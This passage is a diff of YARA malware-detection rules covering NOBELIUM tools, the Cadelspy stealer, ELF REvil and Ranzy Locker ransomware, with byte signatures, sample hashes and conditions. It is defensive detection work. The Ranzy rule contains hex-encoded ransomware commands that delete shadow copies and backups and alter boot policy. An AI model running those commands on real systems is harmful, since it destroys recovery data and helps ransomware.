31 c9 ff 15 1b 52 01 00 48 83 c4 30 89 c7 85 c0 75 28 66 41 c7 06 7b 00 48 83 ec 20 48 8d 15 c0 02 02 00 4c 89 f1 ff 15 17 52 01 00 4c 89 f1 e8 67 c9 00 00 48 83 c4 20 31 ff 48 8b 0b 48 83 ec 20 ff 15 d4 51 01 00 48 83 c4 20 48 8b 4d f8 48 31 e9 48 83 ec 20 e8 f0 79 00 00 48 83 c4 20 89 f8 48 89 ec } + $s2 = { 48 8d 0d 87 c9 01 00 48 8d 15 47 01 00 00 ff 15 1a 14 01 00 48 89 05 e3 d8 01 00 48 85 c0 0f 84 d0 00 00 00 c7 05 e8 d8 01 00 00 00 00 00 48 8d 15 d1 d8 01 00 c7 05 df d8 01 00 b8 0b 00 00 0f 28 05 80 1c 01 00 0f 29 05 b9 d8 01 00 44 8b 05 e2 c8 01 00 41 8d 48 01 89 0d d8 c8 01 00 44 89 05 b5 d8 01 00 48 89 c1 ff 15 b8 13 01 00 31 c9 ba 01 00 00 00 45 31 c0 45 31 c9 ff 15 b5 14 01 00 48 89 05 9e d8 01 00 48 85 c0 0f 84 85 00 00 00 48 b8 04 00 00 00 01 00 00 00 48 89 05 68 d8 01 00 48 8d 15 5d d8 01 00 c7 05 5f d8 01 00 00 00 00 00 48 c7 05 5c d8 01 00 00 00 00 00 48 8b 0d 39 d8 01 00 ff 15 5b 13 01 00 e8 61 01 00 00 85 c0 74 2b 48 b9 01 00 00 00 01 00 00 00 48 89 0d 25 d8 01 00 48 8d 15 1a d8 01 00 89 05 20 d8 01 00 eb 44 48 83 c4 28 48 ff 25 57 14 01 00 48 8b 0d 20 d8 01 00 ba ff ff ff ff ff 15 9d 13 01 00 e8 eb c5 ff ff 48 b8 01 00 00 00 01 00 00 00 48 89 05 e3 d7 01 00 48 8d 15 d8 d7 01 00 c7 05 da d7 01 00 00 00 00 00 48 c7 05 d7 d7 01 00 00 00 00 00 48 8b 0d b4 d7 01 00 48 83 c4 28 48 ff 25 d1 12 01 00 48 83 ec 28 83 f9 01 75 69 48 b8 03 00 00 00 01 00 00 00 48 89 05 9b d7 01 00 48 8d 15 90 d7 01 00 31 c0 89 05 94 d7 01 00 89 05 9a d7 01 00 8b 05 ac c7 01 00 8d 48 01 89 0d a3 c7 01 00 89 05 81 d7 01 00 48 8b 0d 5e d7 01 00 ff 15 80 12 01 } + $s3 = { 48 89 01 c7 44 24 28 00 00 00 00 c7 44 24 20 03 00 00 00 ba 00 00 00 80 41 b8 01 00 00 00 45 31 c9 ff 15 f7 59 01 00 48 83 f8 ff 0f 84 e0 01 00 00 48 89 c6 0f 57 c0 48 8d 94 24 a0 00 00 00 0f 29 42 60 0f 29 42 50 0f 29 42 40 0f 29 42 30 0f 29 42 20 0f 29 42 10 0f 29 02 48 c7 42 70 00 00 00 00 4c 8d 44 24 7c 41 c7 00 78 00 00 00 48 89 c1 ff 15 9f 59 01 00 85 c0 0f 84 d0 01 00 00 8b 84 24 dc 00 00 00 c1 e0 0d 48 8d 8c 24 98 00 00 00 48 89 4c 24 38 89 44 24 20 c7 44 24 30 01 00 00 00 c7 44 24 28 02 00 00 00 48 89 f1 31 d2 45 31 c0 45 31 c9 ff 15 53 59 01 00 85 } + $s4 = { c6 00 00 48 ff c0 48 83 ec 20 48 89 f9 48 89 c2 ff 15 8e 19 01 00 48 8d 15 a9 cd 01 00 48 89 d9 ff 15 86 19 01 00 48 89 d9 ff 15 55 19 01 00 48 } + $s5 = "Global\\APCI#" fullword wide + $s6 = "uGlobal\\HVID_" fullword ascii condition: - uint16(0)==0x5A4D and filesize >50KB and 5 of ($s*) + uint16(0)==0x5A4D and filesize >20KB and 4 of ($s*) } -rule ARKBIRD_SOLG_MAL_Enc_Payload_May_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Cadelspy_Stealer_May_2021_1 : FILE { meta: - description = "Detect encrypted payload, must be with others APT29 rules maybe give lot fake postives due to the pdf header" + description = "Detect Cadelspy stealer" author = "Arkbird_SOLG" - id = "34da1d06-7892-59ec-8b11-c3278a7f2e34" - date = "2021-05-28" - modified = "2021-06-02" + id = "bac23ed9-f51c-546e-8f4e-320d33b51829" + date = "2021-05-30" + modified = "2021-06-05" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_Enc_payload_May_2021_1.yara#L1-L17" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-30/APT39/MAL_Cadelspy_Stealer_May_2021_1.yara#L1-L24" license_url = "N/A" - logic_hash = "484d9947d8acd32126cdc3e3f671cd3b3b048bbdb608d5573f6fcc7e4ddf13f8" - score = 50 + logic_hash = "29fade3703c55bd16e67f9bf126cb0d8a06bc0eafe10e145f8d57d8c4abe5656" + score = 75 quality = 75 tags = "FILE" - hash1 = "23e20d630a8fd12600c2811d8f179f0e408dcb3e82600456db74cbf93a66e70f" - hash2 = "656384c4e5f9fe435d51edf910e7ba28b5c6d183587cf3e8f75fb2d798a01eeb" - level = "Experimental" + hash1 = "8847a73bbd9477be60685ce8ec8333db933892f4d7b729fcef01ac76600de9ff" + hash2 = "f3b0ad96c8529399bd7117bd67cdf0297191476d3a81a60b147960306ae5f068" + hash3 = "88c947d0d0fddd1ea87f5b85982cf231c9c56e4f5e25fac405f608a1c28d8391" tlp = "White" - adversary = "NOBELIUM" + adversary = "APT39" strings: - $s1 = { 25 50 44 46 2d 31 2e 33 0a 25 06 8b c4 1c c5 86 66 f3 dc 75 f9 3b dd 8c 44 e3 d3 a4 74 9d 94 4e 2e 0f d9 01 a6 f2 88 6a a8 0b 16 1b 1a fc 60 3f 72 7a 1b c1 a7 bb 2f 19 31 6d 6f 79 db 20 f6 c7 fa e7 eb b9 88 77 de 1f a1 92 d7 ea 68 a9 b7 89 17 92 e8 b2 bb a5 58 56 b4 30 60 f8 28 0c 54 7b 2b 68 ba 7e 01 01 6d ad 2e 6d 72 67 1e b0 a8 ea 42 82 bd 14 9a 86 f0 0d 9a 8b 92 76 b3 b3 7d ef 69 24 2c 9f c2 ca e9 c9 b3 } - $s2 = { 25 25 45 4f 46 0a } + $str1 = "C:\\Windows\\SysEvent.exe" fullword wide + $str2 = "\\sysprep\\sysprep.exe" fullword wide + $str3 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide + $str4 = "@C:\\Windows\\systemw.dll" fullword wide + $str5 = "systemw.dll" fullword ascii + $str6 = "ApAshell32.dll" fullword wide + $seq1 = { 55 8b ec 83 ec 14 a1 04 00 41 00 33 c5 89 45 fc 8d 45 f8 c7 45 f0 00 00 00 00 50 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 68 20 02 00 00 6a 20 6a 02 8d 45 f0 66 c7 45 f4 00 05 50 ff 15 08 30 40 00 85 c0 74 25 8d 45 ec 50 ff 75 f8 6a 00 ff 15 04 30 40 00 ff 75 f8 f7 d8 1b c0 21 45 ec ff 15 00 30 40 00 83 7d ec 00 75 05 e8 52 fd ff ff 56 68 2d 02 00 00 ff 15 30 30 40 00 68 1c 33 40 00 ff 15 20 30 40 00 6a 00 6a 00 6a 01 6a 00 6a 00 6a 02 68 1c 33 40 00 89 45 f8 ff 15 1c 30 40 00 6a 00 8b f0 8d 45 f8 50 68 00 ba 00 00 68 68 33 40 00 56 ff 15 6c 30 40 00 56 ff 15 74 30 40 00 6a 01 6a 00 6a 00 68 1c 33 40 00 68 4c 33 40 00 6a 00 ff 15 b0 30 40 00 8b 4d fc 33 c0 33 cd 5e e8 06 00 00 00 } + $seq2 = { 8b 0d 10 32 40 00 0f 10 05 24 32 40 00 89 08 8b 0d 14 32 40 00 89 48 04 8b 0d 18 32 40 00 89 48 08 8b 0d 1c 32 40 00 89 48 0c 66 8b 0d 20 32 40 00 66 89 48 10 33 c9 a1 3c 32 40 00 0f 11 84 24 34 04 00 00 89 84 24 4c 04 00 00 f3 0f 7e 05 34 32 40 00 66 0f d6 84 24 44 04 00 00 0f 1f 40 00 0f b7 84 0c c8 0f 00 00 8d 49 02 66 89 84 0c 42 08 00 00 66 85 c0 75 e8 8d bc 24 44 08 00 00 83 c7 fe 66 8b 47 02 83 c7 02 66 85 c0 75 f4 b9 0a 00 00 00 be 40 32 40 00 f3 a5 b9 21 00 00 00 0f 10 05 58 33 40 00 66 a5 8d bc 24 54 0c 00 00 be 70 32 40 00 f3 a5 66 a5 0f 11 84 24 5c 0e 00 00 0f 10 05 78 ed 40 00 0f 11 84 24 6c 0e 00 00 0f 10 05 68 ed 40 00 0f 11 84 24 7c 0e 00 00 38 45 08 75 1f 8d 44 24 10 50 e8 23 fa ff ff 5f 5e 5b 8b 8c 24 c8 11 00 00 33 cc e8 1c 04 00 00 8b } + $seq3 = { 8b 84 b5 e4 d9 ff ff 85 c0 74 66 50 6a 00 68 ff ff 1f 00 ff 15 28 30 40 00 8b f8 85 ff 74 52 8d 85 dc d9 ff ff 50 6a 04 8d 85 d0 d9 ff ff 50 57 ff 15 64 30 40 00 85 c0 74 32 68 04 01 00 00 8d 85 ec fb ff ff 50 ff b5 d0 d9 ff ff 57 ff 15 34 30 40 00 8d 85 ec fb ff ff 68 f8 32 40 00 50 ff 15 38 31 40 00 83 c4 08 85 c0 74 21 57 ff d3 33 ff 8b 85 e0 d9 ff ff 46 c1 e8 02 8b cf 3b f0 0f 82 7b ff ff ff 85 c9 0f 84 43 01 00 00 68 04 01 00 00 8d 85 e4 f9 ff ff 50 6a 00 ff 15 3c 30 40 00 85 c0 0f 84 24 01 00 00 8d 85 f4 fd ff ff 50 68 04 01 00 00 ff 15 14 30 40 00 8d 85 f4 fd ff ff 50 6a 00 68 14 33 40 00 50 ff 15 60 30 40 00 6a 00 8d 85 f4 fd ff ff 50 8d 85 e4 f9 ff ff 50 ff 15 58 30 40 00 85 c0 0f 84 df 00 00 00 6a 00 6a 00 6a 03 6a 00 6a 00 68 00 00 00 c0 8d 85 f4 fd ff ff 50 ff 15 1c 30 40 00 8b f0 83 fe ff 0f 84 b8 00 00 00 6a 00 8d 85 d8 d9 ff ff 50 68 00 10 00 00 8d 85 e4 e9 ff ff 50 56 ff 15 78 30 40 00 85 } condition: - filesize >50KB and all of ($s*) + uint16(0)==0x5a4d and filesize >30KB and 5 of ($str*) and 2 of ($seq*) } -rule ARKBIRD_SOLG_MAL_Nativezone_May_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_ELF_Revil_Jun_2021_1 : FILE { meta: - description = "Detect NativeZone malware" + description = "Detect the ELF version of REvil ransomware" author = "Arkbird_SOLG" - id = "5b858a8d-6e6a-5712-a83a-229bed1c7872" - date = "2021-05-28" - modified = "2021-06-05" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_NativeZone_May_2021_1.yara#L1-L17" + id = "b4b9d60e-a352-5045-8be3-e9a08d70ef6b" + date = "2021-06-28" + modified = "2021-06-29" + reference = "https://twitter.com/jaimeblascob/status/1409603887871500288" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-28/REvil/RAN_ELF_REvil_Jun_2021_1.yara#L1-L22" license_url = "N/A" - logic_hash = "9281784100e922fe3ef64e7c112276ffa5f8691ab4f24f1b68fbb0495e449bd3" + logic_hash = "054bdb8362fdea2dc914b11387f6c67e35932acb73ba2b133ca29f69549914ba" score = 75 quality = 75 tags = "FILE" - hash1 = "136f4083b67bc8dc999eb15bb83042aeb01791fc0b20b5683af6b4ddcf0bbc7d" - hash2 = "3b94cc71c325f9068105b9e7d5c9667b1de2bde85b7abc5b29ff649fd54715c4" + hash1 = "3d375d0ead2b63168de86ca2649360d9dcff75b3e0ffa2cf1e50816ec92b3b7d" + hash2 = "d6762eff16452434ac1acc127f082906cc1ae5b0ff026d0d4fe725711db47763" + hash3 = "796800face046765bd79f267c56a6c93ee2800b76d7f38ad96e5acb92599fcd4" + hash4 = "ea1872b2835128e3cb49a0bc27e4727ca33c4e6eba1e80422db19b505f965bc4" tlp = "White" - adversary = "NOBELIUM" + adversary = "RAAS" strings: - $s1 = { 8b ff 55 8b ec 81 ec 1c 01 00 00 a1 00 ?? 01 10 33 c5 89 45 fc 8b 4d 0c 53 8b 5d 14 56 8b 75 08 89 b5 fc fe ff ff 89 9d f8 fe ff ff 57 8b 7d 10 89 bd 00 ff ff ff 85 f6 75 25 85 c9 74 21 e8 [2] ff ff c7 00 16 00 00 00 e8 [2] ff ff 8b 4d fc 5f 5e 33 cd 5b e8 [2] ff ff 8b e5 5d c3 85 ff 74 db 85 db 74 d7 c7 85 f4 fe ff ff 00 00 00 00 83 f9 02 72 d8 49 0f af cf 03 ce 89 8d 04 ff ff ff 8b c1 33 d2 2b c6 f7 f7 8d 78 01 83 ff 08 0f 87 dc 00 00 00 8b bd 00 ff ff ff 3b ce 0f 86 a1 00 00 00 8d 14 37 89 95 ec fe ff ff 8d 49 00 8b c6 8b f2 89 85 08 ff ff ff 3b f1 77 31 8b ff 50 56 8b cb ff 15 [2] ?? 10 ff d3 83 c4 08 85 c0 7e 0a 8b c6 89 85 08 ff ff ff eb 06 8b 85 08 ff ff ff 8b 8d 04 ff ff ff 03 f7 3b f1 76 d1 8b d1 3b c1 74 34 2b c1 8b df 89 85 08 ff ff ff 90 8a 0c 10 8d 52 01 8b b5 08 ff ff ff 8a 42 ff 88 44 16 ff 8b c6 88 4a ff 83 eb 01 75 e3 8b 9d f8 fe ff ff 8b 8d 04 ff ff ff 8b b5 fc fe ff ff 2b cf 8b 95 ec fe ff ff 89 8d 04 ff ff ff 3b } - $s2 = { 8b b5 00 ff ff ff 8b cb 8b 85 fc fe ff ff d1 ef 0f af fe 03 f8 57 50 ff 15 [3] 10 ff d3 83 c4 08 85 c0 7e 10 56 57 ff b5 fc fe ff ff e8 1b fe ff ff 83 c4 0c ff b5 04 ff ff ff 8b cb ff b5 fc fe ff ff ff 15 [3] 10 ff d3 83 c4 08 85 c0 7e 15 56 ff b5 04 ff ff ff ff b5 fc fe ff ff e8 e9 fd ff ff 83 c4 0c ff b5 04 ff ff ff 8b cb 57 ff 15 [3] 10 ff d3 83 c4 08 85 c0 7e 10 56 ff b5 04 ff ff ff 57 e8 c1 fd ff ff 83 c4 0c 8b 85 04 ff ff ff 8b d8 8b b5 fc fe ff ff 8b 95 00 ff ff ff 89 85 08 ff ff ff 8d 64 24 00 3b fe 76 37 03 f2 89 b5 f0 fe ff ff 3b f7 73 25 8b 8d f8 fe ff ff 57 56 ff 15 [3] 10 ff 95 f8 fe ff ff 8b 95 00 ff ff ff 83 c4 08 85 c0 7e d3 3b fe 77 3d 8b 85 04 ff ff ff 8b 9d f8 fe ff ff 03 f2 3b f0 77 1f 57 56 8b cb ff 15 [3] 10 ff d3 8b 95 00 ff ff ff 83 c4 08 85 c0 8b 85 04 ff ff ff 7e db 8b 9d 08 ff ff ff 89 b5 f0 fe ff ff 8b b5 f8 fe ff ff eb 06 8d 9b 00 00 00 00 8b 95 00 ff ff ff 8b c3 2b da 89 85 08 ff ff ff 3b df 76 1f 57 53 8b ce ff 15 [3] 10 ff d6 83 c4 08 85 c0 7f d9 8b 95 00 ff ff ff 8b 85 08 ff ff ff 8b b5 f0 fe ff ff 89 9d 08 ff ff ff } - $s3 = { 8b 45 f4 89 7d f8 8d 04 86 8b c8 89 45 e8 8b c7 89 4d f4 3b 45 dc 74 5b 8b d6 2b d7 89 55 e4 8b 00 8b d0 89 45 ec 8d 42 01 89 45 f0 8a 02 42 84 c0 75 f9 2b 55 f0 8d 42 01 50 ff 75 ec 89 45 f0 8b 45 e8 2b c1 03 45 fc 50 51 e8 [2] 00 00 83 c4 10 85 c0 75 72 8b 45 f8 8b 55 e4 8b 4d f4 89 0c 02 83 c0 04 03 4d f0 89 4d f4 89 45 f8 3b 45 dc 75 ac 8b 45 0c 89 5d f8 89 30 8b f3 53 e8 [2] ff ff 59 8b 45 dc 8b d7 2b c2 89 55 e4 83 c0 03 c1 e8 02 39 55 dc 1b c9 f7 d1 23 c8 89 4d e8 74 18 8b f1 ff 37 e8 [2] ff ff 43 8d 7f 04 59 3b } + $seq1 = { 55 48 89 e5 48 83 c4 80 bf 04 20 00 00 e8 69 d5 ff ff 48 89 45 f8 ?? 8b 05 [2] 31 00 [0-4] 48 8b 3d [2] 31 00 48 8b 35 [2] 31 00 48 8b 0d [2] 31 00 4c 8b 0d [2] 31 00 4c 8b [2] 13 31 00 48 8b 15 ?? 13 31 00 48 8b 45 f8 4c 89 ?? 24 18 48 89 7c 24 10 48 89 74 24 08 48 89 0c 24 ?? 89 } + $seq2 = { 48 89 e5 bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff 8b 05 [2] 20 00 89 c6 bf [2] 41 00 b8 00 00 00 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff bf [2] 41 00 e8 [2] ff ff } + $seq3 = { 48 83 ec 20 c7 45 fc 00 00 00 00 eb 64 8b 45 fc 48 8b 14 c5 48 92 61 00 48 8b 05 ?? bd 20 00 48 89 c6 bf 40 93 61 00 b8 00 00 00 00 e8 ?? 3f ff ff 8b 45 fc 48 8b 04 c5 48 92 61 00 48 89 c6 bf [2] 41 00 b8 00 00 00 00 e8 ?? 3d ff ff be [2] 41 00 bf 40 93 61 00 e8 ?? 3e ff ff 48 89 45 f0 48 8b 45 f0 48 89 c7 e8 ?? 3d ff ff 83 45 fc 01 83 7d fc 00 74 96 48 8b 05 [2] 20 00 48 89 c7 e8 ?? 3c ff ff 48 8b 05 [2] 20 00 be [2] 41 00 48 89 c7 e8 ?? 3e ff ff 48 89 45 e8 48 8b 45 e8 48 89 c7 e8 ?? 3d ff ff c9 c3 55 48 89 e5 48 83 ec 20 48 89 7d e8 48 8b 45 e8 48 89 c7 e8 ?? 3c ff ff 89 c2 8b 05 ?? d0 30 00 01 d0 83 c0 01 89 c7 e8 ?? 91 ff ff 48 89 45 f8 48 8b 55 e8 48 8b 45 f8 48 89 d6 48 89 c7 e8 ?? 3c ff ff 48 8b 45 f8 48 c7 c1 ff ff ff ff 48 89 c2 b8 00 00 00 00 48 89 d7 f2 ae 48 89 c8 48 f7 d0 48 8d 50 ff 48 8b 45 f8 48 01 d0 66 c7 00 2f 00 48 8b 15 ?? cf 30 00 48 8b 45 f8 48 89 d6 48 89 c7 e8 ?? 3e ff ff 48 8b 45 f8 be [2] 41 00 48 89 c7 e8 ?? 3e ff ff 48 89 45 f0 48 83 7d f0 00 } + $seq4 = { 48 89 e5 48 83 ec 10 c7 45 fc 58 00 00 00 8b 45 fc 48 8d 55 f0 48 89 c6 bf 00 a5 71 00 e8 [2] 00 00 48 89 05 ?? 0b 31 00 48 8d 45 f0 48 89 c2 be 20 00 00 00 bf c0 a4 71 00 e8 [2] 00 00 48 89 05 [2] 31 00 b8 00 00 00 00 e8 b7 fd ff ff 48 89 05 [2] 31 00 48 8b 05 [2] 31 00 48 85 c0 74 09 48 8b 05 [2] 31 00 eb 05 b8 [2] 41 00 48 89 05 [2] 31 00 b8 00 00 00 00 e8 80 fe ff ff 48 89 05 [2] 31 00 48 8b 05 [2] 31 00 48 85 c0 74 09 48 8b 05 [2] 31 00 eb 05 b8 [2] 41 00 48 89 05 ?? 0a 31 00 48 c7 05 ?? 0a 31 00 [2] 41 00 e8 ?? f6 ff ff e8 f1 f7 ff ff b8 01 00 00 00 } condition: - uint16(0)==0x5a4d and filesize >50KB and all of ($s*) + uint32(0)==0x464c457f and filesize >50KB and 3 of ($seq*) } -rule ARKBIRD_SOLG_MAL_Boombox_May_2021_1 : FILE +rule ARKBIRD_SOLG_Ran_Ranzy_Locker_Nov_2020_1 : FILE { meta: - description = "Detect BoomBox malware" + description = " Detect Ranzy Locker (RAAS)" author = "Arkbird_SOLG" - id = "b2629c5b-1fb0-5ea1-8661-faf8f1d6b578" - date = "2021-05-28" - modified = "2021-06-05" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-01/NOBELIUM/MAL_BoomBox_May_2021_1.yara#L1-L18" + id = "7e81d73a-ef18-5f89-b6b3-f56212d30b4a" + date = "2020-11-19" + modified = "2020-11-19" + reference = "https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-19/Ranzy_Locker/Ran_Ranzy_Locker_Nov_2020_1.yar#L1-L36" license_url = "N/A" - logic_hash = "b88848ead9c992392c99e88a25541b72d825fbd32c3eb83fefc18e7cfbd08cc8" + logic_hash = "e27017fa196d14b88c5cb682a070d10e42b63f9e21189d9917c0ae03c47216cc" score = 75 quality = 75 tags = "FILE" - hash1 = "0acb884f2f4cfa75b726cb8290b20328c8ddbcd49f95a1d761b7d131b95bafec" - hash2 = "8199f309478e8ed3f03f75e7574a3e9bce09b4423bd7eb08bb5bff03af2b7c27" - tlp = "White" - adversary = "NOBELIUM" + hash1 = "393fd0768b24cd76ca653af3eba9bff93c6740a2669b30cf59f8a064c46437a2" + hash2 = "90691a36d1556ba7a77d0216f730d6cd9a9063e71626489094313c0afe85a939" + hash3 = "ade5d0fe2679fb8af652e14c40e099e0c1aaea950c25165cebb1550e33579a79" + hash4 = "bbf122cce1176b041648c4e772b230ec49ed11396270f54ad2c5956113caf7b7" + hash5 = "c4f72b292750e9332b1f1b9761d5aefc07301bc15edf31adeaf2e608000ec1c9" strings: - $s1 = { 13 30 06 00 90 01 00 00 07 00 00 11 1f 1a 28 53 00 00 0a 25 72 bc 05 00 70 28 1e 00 00 0a 0a 06 28 54 00 00 0a 2d 07 06 28 55 00 00 0a 26 72 ea 05 00 70 28 1e 00 00 0a 0b 07 28 54 00 00 0a 2d 22 07 28 55 00 00 0a 26 07 72 12 06 00 70 28 1e 00 00 0a 0b 07 28 54 00 00 0a 2d 07 07 28 55 00 00 0a 26 73 08 00 00 06 25 7e 08 00 00 04 72 1c 06 00 70 6f 06 00 00 06 0c 08 2c 46 08 8e 69 1f 11 59 8d 2b 00 00 01 13 04 08 1f 0a 11 04 16 11 04 8e 69 28 56 00 00 0a 73 05 00 00 06 11 04 7e 09 00 00 04 7e 0a 00 00 04 6f 03 00 00 06 13 05 06 72 3c 06 00 70 28 1e 00 00 0a 11 05 28 57 00 00 0a 06 72 3c 06 00 70 28 1e 00 00 0a 28 58 00 00 0a 2c 46 7e 59 00 00 0a 72 64 06 00 70 17 6f 5a 00 00 0a 13 06 11 06 72 c0 06 00 70 6f 5b 00 00 0a 2d 26 11 06 72 c0 06 00 70 72 e8 06 00 70 06 72 3c 06 00 70 28 1e 00 00 0a 72 12 07 00 70 28 5c 00 00 0a 6f 5d 00 00 0a 7e 08 00 00 04 72 38 07 00 70 6f 06 00 00 06 0d 09 2c 46 09 8e 69 1f 11 59 8d 2b 00 00 01 13 07 09 1f 0a 11 07 16 11 07 8e 69 28 56 00 00 0a 73 05 00 00 06 11 07 7e 09 00 00 04 7e 0a 00 00 04 6f 03 00 00 06 13 08 07 72 58 07 00 70 28 1e 00 00 0a 11 08 28 57 00 00 0a 06 72 3c 06 00 70 28 1e 00 00 0a 28 58 00 00 0a 2c 16 72 84 07 00 70 06 72 9e 07 00 70 28 1e 00 00 0a 28 5e 00 00 0a 26 2a } - $s2 = { 13 30 05 00 11 01 00 00 05 00 00 11 02 7b 02 00 00 04 72 0b 03 00 70 28 1e 00 00 0a 28 30 00 00 0a 74 2d 00 00 01 25 20 c0 d4 01 00 6f 31 00 00 0a 25 72 86 01 00 70 6f 32 00 00 0a 25 72 98 01 00 70 6f 34 00 00 0a 25 6f 35 00 00 0a 72 71 02 00 70 72 8d 02 00 70 03 28 1e 00 00 0a 6f 36 00 00 0a 25 72 2b 03 00 70 6f 3f 00 00 0a 72 9d 02 00 70 04 72 5d 03 00 70 28 37 00 00 0a 0a 25 6f 35 00 00 0a 72 bb 02 00 70 06 6f 38 00 00 0a 25 6f 40 00 00 0a 05 16 05 8e 69 6f 2e 00 00 0a 6f 39 00 00 0a 74 1a 00 00 01 0b 07 6f 3a 00 00 0a 20 c8 00 00 00 33 64 07 6f 3e 00 00 0a 73 41 00 00 0a 6f 42 00 00 0a 0c 02 7b 06 00 00 04 08 6f 43 00 00 0a 6f 44 00 00 0a 17 6f 45 00 00 0a 6f 46 00 00 0a 72 02 04 00 70 28 47 00 00 0a 2c 29 02 7b 03 00 00 04 08 6f 43 00 00 0a 26 02 7b 04 00 00 04 08 6f 43 00 00 0a 26 02 7b 05 00 00 04 08 6f 43 00 00 0a 26 17 2a 16 2a 16 2a } - $s3 = { 13 30 04 00 6d 01 00 00 0a 00 00 11 72 f2 07 00 70 28 54 00 00 0a 39 5d 01 00 00 72 [2] 00 70 72 f2 07 00 70 28 5e 00 00 0a 26 1f 1a 28 53 00 00 0a 72 ?? 08 00 70 28 1e 00 00 0a 28 58 00 00 0a 3a 32 01 00 00 1f 0a 8d 2b 00 00 01 25 d0 0c 00 00 04 28 67 00 00 0a 0a 1d 8d 2b 00 00 01 25 d0 0b 00 00 04 28 67 00 00 0a 0b 28 4b 00 00 0a 6f 4c 00 00 0a 28 0c 00 00 06 26 72 d5 00 00 70 28 49 00 00 0a 6f 4a 00 00 0a 28 0c 00 00 06 0c 73 0a 00 00 06 6f 09 00 00 06 0d 09 2c 56 28 68 00 00 0a 09 6f 61 00 00 0a 13 05 73 05 00 00 06 11 05 7e 09 00 00 04 7e 0a 00 00 04 6f 04 00 00 06 13 06 06 11 06 28 0d 00 00 06 13 07 11 07 07 28 0d 00 00 06 13 07 73 08 00 00 06 7e 08 00 00 04 72 ?? 08 00 70 08 28 10 00 00 0a 11 07 6f 07 00 00 06 26 28 0b 00 00 06 28 4b 00 00 0a 6f 4c 00 00 0a 13 04 11 04 72 d5 00 00 70 28 69 00 00 0a 2c 65 73 02 00 00 06 11 04 6f 01 00 00 06 13 08 11 08 2c 53 73 05 00 00 06 28 68 00 00 0a 11 08 6f 61 00 00 0a 7e 09 00 00 04 7e 0a 00 00 04 6f 04 00 00 06 13 09 06 11 09 28 0d 00 00 06 13 0a 11 0a 07 28 0d 00 00 06 13 0a 73 08 00 00 06 7e 08 00 00 04 72 ?? 08 00 70 08 28 10 00 00 0a 11 0a 6f 07 00 00 06 26 2a } - $s4 = { 1b 30 05 00 b5 00 00 00 06 00 00 11 72 76 05 00 70 72 d5 00 00 70 28 49 00 00 0a 6f 4a 00 00 0a 28 10 00 00 0a 0a 72 84 05 00 70 28 4b 00 00 0a 6f 4c 00 00 0a 28 10 00 00 0a 0b 72 90 05 00 70 0c 28 4d 00 00 0a 28 49 00 00 0a 6f 4e 00 00 0a 13 04 16 13 05 2b 2a 11 04 11 05 9a 13 06 11 06 6f 4f 00 00 0a 18 33 13 08 11 06 6f 50 00 00 0a 72 98 05 00 70 28 37 00 00 0a 0c 11 05 17 58 13 05 11 05 11 04 8e 69 32 ce 28 51 00 00 0a 6f 52 00 00 0a 0d 72 9c 05 00 70 1a 8d 10 00 00 01 25 16 06 a2 25 17 07 a2 25 18 08 a2 25 19 09 a2 28 1d 00 00 0a 13 07 de 06 26 14 13 07 de 00 11 07 2a 00 00 00 01 10 00 00 00 00 00 00 ac ac 00 06 10 00 00 01 } + $s1 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550" ascii + $s2 = "776D69632E65786520534841444F57434F5059202F6E6F696E746572616374697665" ascii + $s3 = "76737361646D696E2E6578652044656C65746520536861646F7773202F416C6C202F5175696574" ascii + $s4 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550202D64656C6574654F6C64657374" ascii + $s5 = "534F4654574152455C4D6963726F736F66745C45524944" ascii + $s6 = "626364656469742E657865202F736574207B64656661756C747D20626F6F74737461747573706F6C6963792069676E6F7265616C6C6661696C75726573" + $s7 = "7B5549447D" ascii + $s8 = "7B5041545445524E5F49447D" ascii + $s9 = "726561646D652E747874" ascii + $s10 = "226E6574776F726B223A22" ascii + $s11 = "226C616E67223A22" ascii + $s12 = "7B4558547D" ascii + $s13 = "476C6F62616C5C33353335354641352D303745392D343238422D423541352D314338384341423242343838" + $s14 = "433A5C50726F6772616D2046696C65735C4D6963726F736F66742053514C20536572766572" ascii + $s15 = "433A5C50726F6772616D2046696C65732028783836295C4D6963726F736F66742053514C20536572766572" ascii + $s16 = "227375626964223A22" ascii + $s17 = "22657874223A22" ascii + $s18 = "226B6579223A22" ascii + $seq1 = { 8b 46 50 8d 4d a4 83 7d d4 10 53 8b 1d 14 80 41 00 89 45 a4 8d 45 c0 0f 43 45 c0 51 50 6a 00 6a 01 6a 00 